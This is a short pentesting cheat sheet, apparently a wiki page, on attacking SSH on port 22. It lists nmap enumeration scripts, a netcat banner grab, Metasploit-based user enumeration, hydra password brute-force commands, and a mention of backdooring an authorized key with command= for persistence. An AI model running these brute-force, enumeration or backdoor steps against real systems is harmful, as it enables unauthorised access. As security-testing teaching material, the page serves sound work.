SSH

Pentesting SSH - TCP Port 22

Theory

SSH or Secure Shell or Secure Socket Shell, is a network protocol that gives users a secure way to access a computer over an unsecured network.

SHH protocol operate by default on TCP port 22

Practice

Enumerate SSH server

We can use nmap to enumerate informations about the running SSH server

# Send default nmap scripts for SSH and retreive version
nmap -p22 <ip> -sC -sV

# Send all nmap ssh related scripts
nmap -p22 <ip> --script ssh-*

# Retrieve supported algorythms 
nmap -p22 <ip> --script ssh2-enum-algos

# Retrieve weak keys
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full

# Check authentication methods for an user
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"

We can use Netcat to enumerate the SSH server banner

nc -vn <IP> 22

(python) may be used for ssh server & client configuration auditing.

#Basic audit
python ssh-audit.py <IP>

Enumerate Users

In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this:

msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers

Brute-Force Credentials

When bruteforcing accounts, you may lock accounts

# -t : Number of tasks
# -L/l : username list / username 
# -P/p : password list / password
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4

# -s : Specific port
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4

Crack SSH Private Key

Persistence

It's possible to backdoor an SSH public key using the command= argument. The backdoor will execute whenever the user logs in using this key.

Resources

Last updated 8 months ago

Was this helpful?